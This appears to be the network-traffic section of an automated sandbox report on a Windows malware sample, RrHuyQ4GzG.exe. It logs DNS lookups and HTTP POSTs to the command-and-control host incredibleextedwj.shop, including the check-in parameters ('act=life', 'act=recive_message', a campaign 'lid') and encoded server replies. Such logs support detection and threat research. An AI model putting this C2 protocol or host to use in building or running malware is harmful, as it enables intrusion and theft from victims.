                                                              Apr 20, 2024 13:27:03.231676102 CEST44349732104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:03.231935024 CEST49732443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:03.237484932 CEST49732443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:03.237495899 CEST44349732104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:03.237896919 CEST44349732104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:03.290801048 CEST49732443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:03.321626902 CEST49732443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:03.321660995 CEST49732443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:03.321978092 CEST44349732104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:03.765461922 CEST44349732104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:03.765583992 CEST44349732104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:03.765650988 CEST49732443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:03.767455101 CEST49732443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:03.767468929 CEST44349732104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:03.767494917 CEST49732443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:03.767498970 CEST44349732104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:03.771338940 CEST49733443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:03.771363020 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:03.771508932 CEST49733443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:03.771922112 CEST49733443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:03.771931887 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:03.990796089 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:03.991070986 CEST49733443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:03.993860006 CEST49733443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:03.993874073 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:03.994203091 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.003581047 CEST49733443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.003581047 CEST49733443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.003688097 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.568134069 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.568213940 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.568245888 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.568264008 CEST49733443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.568280935 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.568320036 CEST49733443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.568325996 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.568339109 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.568383932 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.568384886 CEST49733443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.568393946 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.568443060 CEST49733443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.568451881 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.568697929 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.568737984 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.568739891 CEST49733443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.568747997 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.568783998 CEST49733443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.568809986 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.568880081 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.568923950 CEST49733443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.569103003 CEST49733443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.569123030 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.569139957 CEST49733443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.569145918 CEST44349733104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.674922943 CEST49734443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.674962044 CEST44349734104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.675041914 CEST49734443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.675380945 CEST49734443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.675391912 CEST44349734104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.896754026 CEST44349734104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.896833897 CEST49734443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.898129940 CEST49734443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.898135900 CEST44349734104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.898452997 CEST44349734104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.899681091 CEST49734443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.899820089 CEST49734443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.899842978 CEST44349734104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:04.899915934 CEST49734443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:04.899923086 CEST44349734104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:05.449254990 CEST44349734104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:05.449393988 CEST44349734104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:05.449457884 CEST49734443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:05.449598074 CEST49734443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:05.449613094 CEST44349734104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:05.540632010 CEST49735443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:05.540671110 CEST44349735104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:05.540760040 CEST49735443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:05.541157961 CEST49735443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:05.541172028 CEST44349735104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:05.759438038 CEST44349735104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:05.759577036 CEST49735443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:05.761388063 CEST49735443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:05.761400938 CEST44349735104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:05.761739016 CEST44349735104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:05.763335943 CEST49735443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:05.763503075 CEST49735443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:05.763534069 CEST44349735104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:06.281204939 CEST44349735104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:06.281296015 CEST44349735104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:06.281373978 CEST49735443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:06.281547070 CEST49735443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:06.281569004 CEST44349735104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:06.453142881 CEST49736443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:06.453191996 CEST44349736104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:06.453284025 CEST49736443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:06.453722000 CEST49736443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:06.453739882 CEST44349736104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:06.681066036 CEST44349736104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:06.681209087 CEST49736443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:06.682782888 CEST49736443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:06.682804108 CEST44349736104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:06.683594942 CEST44349736104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:06.685053110 CEST49736443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:06.685307980 CEST49736443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:06.685380936 CEST44349736104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:06.685473919 CEST49736443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:06.685488939 CEST44349736104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:07.220552921 CEST44349736104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:07.220868111 CEST44349736104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:07.220957994 CEST49736443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:07.220957994 CEST49736443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:07.454931974 CEST49737443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:07.454977036 CEST44349737104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:07.455056906 CEST49737443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:07.455393076 CEST49737443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:07.455418110 CEST44349737104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:07.678567886 CEST44349737104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:07.678658962 CEST49737443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:07.680037975 CEST49737443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:07.680063963 CEST44349737104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:07.680421114 CEST44349737104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:07.681801081 CEST49737443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:07.682216883 CEST49737443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:07.682260036 CEST44349737104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:08.193986893 CEST44349737104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:08.194276094 CEST44349737104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:08.194283009 CEST49737443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:08.194341898 CEST49737443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:08.257571936 CEST49738443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:08.257620096 CEST44349738104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:08.257694960 CEST49738443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:08.258013964 CEST49738443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:08.258028984 CEST44349738104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:08.483793974 CEST44349738104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:08.484184980 CEST49738443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:08.485327959 CEST49738443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:08.485352039 CEST44349738104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:08.486325026 CEST44349738104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:08.487488031 CEST49738443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:08.487633944 CEST49738443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:08.487657070 CEST44349738104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:08.992181063 CEST44349738104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:08.992522001 CEST44349738104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:08.992620945 CEST49738443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:08.992706060 CEST49738443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:08.992749929 CEST44349738104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:09.597812891 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.597907066 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:09.598006964 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.598407984 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.598442078 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:09.825284004 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:09.825517893 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.826682091 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.826735020 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:09.827158928 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:09.828377962 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.829165936 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.829221010 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:09.829369068 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.829412937 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:09.829552889 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.829596996 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:09.829787016 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.829847097 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:09.830070019 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.830141068 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:09.830391884 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.830450058 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:09.830476999 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.830507994 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:09.830651999 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.830699921 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:09.830749035 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.830845118 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.830899954 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.872133970 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:09.872591972 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.872709990 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.872800112 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.920134068 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:09.920516014 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.947293997 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:09.947359085 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:13.302175999 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:13.302485943 CEST44349739104.21.86.106192.168.2.4
                                                              Apr 20, 2024 13:27:13.302620888 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:13.303299904 CEST49739443192.168.2.4104.21.86.106
                                                              Apr 20, 2024 13:27:13.303344965 CEST44349739104.21.86.106192.168.2.4
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Apr 20, 2024 13:27:02.865027905 CEST5473053192.168.2.41.1.1.1
                                                              Apr 20, 2024 13:27:02.985547066 CEST53547301.1.1.1192.168.2.4
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Apr 20, 2024 13:27:02.865027905 CEST192.168.2.41.1.1.10x2fdcStandard query (0)incredibleextedwj.shopA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Apr 20, 2024 13:27:02.985547066 CEST1.1.1.1192.168.2.40x2fdcNo error (0)incredibleextedwj.shop104.21.86.106A (IP address)IN (0x0001)false
                                                              Apr 20, 2024 13:27:02.985547066 CEST1.1.1.1192.168.2.40x2fdcNo error (0)incredibleextedwj.shop172.67.218.63A (IP address)IN (0x0001)false
                                                              • incredibleextedwj.shop
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.449732104.21.86.1064437508C:\Users\user\Desktop\RrHuyQ4GzG.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-04-20 11:27:03 UTC269OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: application/x-www-form-urlencoded
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 8
                                                              Host: incredibleextedwj.shop
                                                              2024-04-20 11:27:03 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                              Data Ascii: act=life
                                                              2024-04-20 11:27:03 UTC802INHTTP/1.1 200 OK
                                                              Date: Sat, 20 Apr 2024 11:27:03 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=cpamc1kk68bq5darkvsoeqf0oi; expires=Wed, 14-Aug-2024 05:13:42 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HsGCCESG2eyLKSC2VDj0MjCi0aWzrGfDzzuE7yA0qvRywRNhTTdjSJ3bID8i3bvUbueD0MEWPQWDzpoxjDJR5cru0FXdC8SaOcmf01tvP5N5DdRgRHMMrsUwI3vyOa%2F93xkT6Y2OQ1%2F"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8774c86e5c851373-ATL
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-04-20 11:27:03 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                              Data Ascii: 2ok
                                                              2024-04-20 11:27:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.449733104.21.86.1064437508C:\Users\user\Desktop\RrHuyQ4GzG.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-04-20 11:27:04 UTC270OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: application/x-www-form-urlencoded
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 55
                                                              Host: incredibleextedwj.shop
                                                              2024-04-20 11:27:04 UTC55OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 67 47 5a 73 72 2d 2d 4b 69 72 69 65 6e 26 6a 3d 64 65 66 61 75 6c 74
                                                              Data Ascii: act=recive_message&ver=4.0&lid=jgGZsr--Kirien&j=default
                                                              2024-04-20 11:27:04 UTC806INHTTP/1.1 200 OK
                                                              Date: Sat, 20 Apr 2024 11:27:04 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=iua2m1jc8l7qla9mt6uu54jvqu; expires=Wed, 14-Aug-2024 05:13:43 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y70BybKtsbKM%2B%2FZ1TNpO95QnvWcnbT92q4F65yxdhlfWaKw3LqcJSWofed8U8Js5zukFUx%2FxXK7fSYMw58Ai8oEu%2FFD2xGgZN8SsX252kSo8lxeS01lXozyh9dlkrKfxO0cxkKrhxfcj"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8774c8732e9c07e6-ATL
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-04-20 11:27:04 UTC563INData Raw: 35 30 34 0d 0a 6e 36 50 5a 4f 61 34 58 45 34 35 68 38 6a 46 7a 75 4a 30 77 63 55 37 50 33 58 63 36 55 50 61 35 75 56 51 51 55 31 71 6d 37 30 6e 6b 71 64 41 62 32 44 55 70 72 6c 58 65 4f 33 71 61 37 6c 56 54 64 4f 2b 70 42 55 38 31 32 72 4f 77 64 6e 45 33 65 4a 7a 50 4c 2f 37 50 71 6c 79 43 48 52 71 73 44 49 6f 54 53 5a 6a 47 4f 6e 67 31 78 64 52 2b 47 44 57 59 6d 34 4e 30 4d 69 51 2f 78 49 6f 78 36 38 61 33 53 73 64 34 66 63 34 4d 6c 30 55 53 31 66 78 44 47 6d 43 6d 73 6c 55 57 57 76 2b 77 6d 7a 46 71 63 57 43 47 7a 51 54 36 31 37 68 30 7a 32 52 34 72 45 33 34 4f 48 71 61 2b 45 52 54 64 4f 2f 2f 4b 78 67 67 6c 38 76 59 4f 57 4d 50 65 4a 79 55 46 62 33 4b 72 56 7a 63 64 6d 66 6e 44 70 78 43 4c 35 71 6e 42 6b 46 2b 2f 2b 31 48 52 33 4c 38 73 4d 52 65 47 51
                                                              Data Ascii: 504n6PZOa4XE45h8jFzuJ0wcU7P3Xc6UPa5uVQQU1qm70nkqdAb2DUprlXeO3qa7lVTdO+pBU812rOwdnE3eJzPL/7PqlyCHRqsDIoTSZjGOng1xdR+GDWYm4N0MiQ/xIox68a3Ssd4fc4Ml0US1fxDGmCmslUWWv+wmzFqcWCGzQT617h0z2R4rE34OHqa+ERTdO//Kxggl8vYOWMPeJyUFb3KrVzcdmfnDpxCL5qnBkF+/+1HR3L8sMReGQ
                                                              2024-04-20 11:27:04 UTC728INData Raw: 4d 5a 6a 48 4e 2f 37 51 36 51 51 52 6e 52 39 46 63 42 4a 36 53 79 47 46 67 2f 6e 74 54 59 4e 6e 55 37 4d 73 75 48 4c 2f 44 4d 76 56 76 4d 4e 54 2b 45 61 50 73 54 46 73 4b 2f 43 6c 46 73 6a 72 6f 46 58 7a 36 43 6d 65 46 32 47 6c 6f 6e 69 75 5a 70 76 36 6e 51 51 71 51 65 47 71 77 45 6e 42 4e 4a 6d 4c 39 61 46 69 2b 75 74 42 70 62 4f 70 2f 4a 32 79 52 30 50 44 33 57 69 79 37 7a 79 37 68 4a 78 6e 74 33 37 77 71 62 57 68 54 64 2b 78 4a 64 52 4d 62 55 56 56 38 71 31 49 4f 5a 64 6c 4d 38 4d 38 69 48 50 50 32 42 30 7a 44 54 4f 78 6d 48 47 76 67 34 65 70 72 34 58 6c 4e 30 37 2f 38 52 57 54 61 56 33 39 55 34 64 6a 30 2b 79 6f 41 6b 2b 38 75 37 58 4d 5a 39 65 65 30 4f 6d 31 77 52 33 2f 4a 57 46 53 43 73 75 6c 55 57 57 76 2b 77 6d 7a 46 71 63 57 43 47 7a 51 58 36 77
                                                              Data Ascii: MZjHN/7Q6QQRnR9FcBJ6SyGFg/ntTYNnU7MsuHL/DMvVvMNT+EaPsTFsK/ClFsjroFXz6CmeF2GloniuZpv6nQQqQeGqwEnBNJmL9aFi+utBpbOp/J2yR0PD3Wiy7zy7hJxnt37wqbWhTd+xJdRMbUVV8q1IOZdlM8M8iHPP2B0zDTOxmHGvg4epr4XlN07/8RWTaV39U4dj0+yoAk+8u7XMZ9ee0Om1wR3/JWFSCsulUWWv+wmzFqcWCGzQX6w
                                                              2024-04-20 11:27:04 UTC1369INData Raw: 33 34 65 38 0d 0a 47 36 51 65 62 71 4a 72 2b 30 70 35 73 5a 51 53 46 43 44 74 35 31 63 59 4e 4a 6a 65 31 44 68 79 50 7a 6e 4a 69 79 2f 77 77 61 6c 64 33 6e 4a 77 37 77 43 57 56 68 58 61 2f 6c 63 57 4b 4b 57 37 47 56 64 79 32 72 4f 77 58 54 49 32 49 49 54 56 61 62 33 75 72 46 58 61 66 6d 58 72 45 34 46 70 55 2b 2f 38 58 42 30 72 75 2f 39 39 4d 79 33 61 73 37 41 76 47 6c 70 54 68 49 6f 6e 76 5a 6e 35 47 38 56 6e 59 2b 67 46 6d 31 67 44 79 50 56 57 45 69 32 71 73 42 52 54 4e 35 6a 52 30 44 4a 67 4f 54 48 48 6e 79 2f 39 79 72 46 64 6a 44 73 5a 68 32 6a 51 56 41 6d 61 70 78 42 54 43 4b 43 76 47 56 4d 6b 6b 38 76 75 4e 58 77 2f 50 39 4c 4e 51 35 62 65 39 54 4f 6e 62 42 6d 48 61 4e 42 55 48 5a 71 6e 45 46 4d 6a 6f 72 41 64 57 44 4f 51 31 74 38 33 66 7a 30 78 78
                                                              Data Ascii: 34e8G6QebqJr+0p5sZQSFCDt51cYNJje1DhyPznJiy/wwald3nJw7wCWVhXa/lcWKKW7GVdy2rOwXTI2IITVab3urFXafmXrE4FpU+/8XB0ru/99My3as7AvGlpThIonvZn5G8VnY+gFm1gDyPVWEi2qsBRTN5jR0DJgOTHHny/9yrFdjDsZh2jQVAmapxBTCKCvGVMkk8vuNXw/P9LNQ5be9TOnbBmHaNBUHZqnEFMjorAdWDOQ1t83fz0xx
                                                              2024-04-20 11:27:04 UTC1369INData Raw: 5a 2b 52 76 38 65 48 33 6e 44 39 4a 6d 45 74 54 78 56 51 56 73 78 64 51 4b 46 6c 72 2f 77 72 4e 64 47 58 45 2f 79 4d 31 7a 76 34 47 30 57 73 46 2f 65 75 49 50 6b 56 4d 56 32 66 56 53 48 43 6d 72 74 78 78 59 49 4a 50 55 32 6a 64 35 4f 6a 58 4b 69 43 72 34 78 76 73 56 70 42 34 61 72 41 53 49 45 30 6d 59 76 33 38 36 46 75 33 58 66 6b 64 38 2f 4c 44 43 58 68 6c 61 65 4d 4f 42 61 36 57 44 2b 31 2f 47 64 58 7a 6d 43 4a 39 51 46 74 54 2f 58 78 6b 2b 70 62 38 56 56 6a 53 56 31 39 34 33 66 6a 49 71 79 49 73 6d 2b 38 6d 70 47 34 49 64 47 6f 64 44 6c 30 74 52 67 72 30 53 4d 79 65 68 76 42 6c 5a 4e 64 62 36 30 54 56 35 50 58 72 78 6a 69 58 7a 78 71 30 62 70 42 35 75 6f 6d 76 37 53 6e 6d 78 6c 42 49 55 49 4f 33 6e 56 78 67 32 6b 4e 66 62 4d 58 77 31 50 73 6d 4b 49 50
                                                              Data Ascii: Z+Rv8eH3nD9JmEtTxVQVsxdQKFlr/wrNdGXE/yM1zv4G0WsF/euIPkVMV2fVSHCmrtxxYIJPU2jd5OjXKiCr4xvsVpB4arASIE0mYv386Fu3Xfkd8/LDCXhlaeMOBa6WD+1/GdXzmCJ9QFtT/Xxk+pb8VVjSV1943fjIqyIsm+8mpG4IdGodDl0tRgr0SMyehvBlZNdb60TV5PXrxjiXzxq0bpB5uomv7SnmxlBIUIO3nVxg2kNfbMXw1PsmKIP
